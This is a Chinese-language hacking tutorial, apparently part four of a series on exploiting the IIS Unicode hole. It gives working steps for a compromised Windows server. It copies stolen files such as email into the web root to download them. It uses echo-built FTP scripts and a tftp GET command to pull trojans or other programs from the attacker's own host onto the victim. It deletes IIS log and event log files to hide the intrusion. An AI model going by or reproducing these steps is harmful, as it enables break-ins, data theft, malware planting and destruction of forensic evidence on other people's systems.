基础4.txt

对黑客的简单介绍从<黑客的基本技能>开始,一直到木马,漏洞,监听,防范,跳板,等等,全手工整理,如果有乱码请换一下unicode字符.

基础知识（4）

上传，这个我们后面介绍。 

几点忠告： 

1，对于没有主页的机器（就是正在建立的主页），不要改它，这很没水准，也很没道德 

2，echo前记得帮他们做好备份 

3，不准在主页里加入恶性语句 

2，下载文件 

要是有什么有用的文件被你发现，那我们如何下载呢？ 

最简单的方法：把文件copy至网页目录下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然后，下载11.11.22.22/baby.zip就行了，注意！实际应用中要记得对文件名进行修改，总之不能暴露。 

别的方法：对不起，没想好：） 

3，最重要的上传 

一般方法：ftp法 

首先建一个ftp脚本文件：c:\hehe.haha（名字乱取把），申请一个ftp账号，然后用echo吧 

echo+open ftp.cshu.com（ftp主机） > c:\hehe.haha 

echo+user yourname >> cc:\hehe.haha (yourname是用户名) 

echo+yourpasswd >> c:\hehe.haha (yourpasswd是密码) 

echo+get setup.exe >> c:\hehe.haha 要下载的文件 

echo+quit >> c:\hehe.haha 

完了以后：ftp+/s:c:\hehe.haha,由于是ftp主机，那么速度一定很快，过一会setup.exe就会出现在当前目录了（也就是cmd所在目录） 

别忘了先上传到ftp主机，不要做马大哈哦！ 

最简单的方法：tftp法。 

这种方法不用中转服务器，首先准备一个tftp服务端，它的作用就是把你的机器做成一个tftp服务器，利用漏洞机器来下载（注意，运行tftp时不要运行其他的ftp软件） 

在这里我推荐cisco tftp server，自己去找找把，实在没有来找我：） 

安装好后运行，别忘了设置好默认目录，否则会找不到文件 

tftp命令：tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe（ihateu.exe在默认目录里） 

1.2.3.4为你的ip，用unicode运行一下，会看到tftp server里有反应了，这就好了，不一会，文件就传上去了，方便把！ 

学会了上传，我们就可以好好改主页，还可以上传木马，还可以把程序放上去运行…………（运行程序和在dos里一样） 

4，如何清除痕迹 

虽然国内主机纪录ip的不是很多，但万事小心为妙，unicode权限达不到admin。用cleaniislog行不通，就…………直接删吧！ 

C:\winnt\system32\logfiles\*.* 

C:\winnt\ssytem32\config\*.evt 

C:\winnt\system32\dtclog\*.* 

C:\winnt\system32\*.log 

C:\winnt\system32\*.txt 

C:\winnt\*.txt 

C:\winnt\*.log 

全……擦掉！ 

四，细节问题。 

1，遇到长文件名怎么办？ 

c:\program files\ 

就用c:\"program20%files"\ 

2，遇到空格怎么办？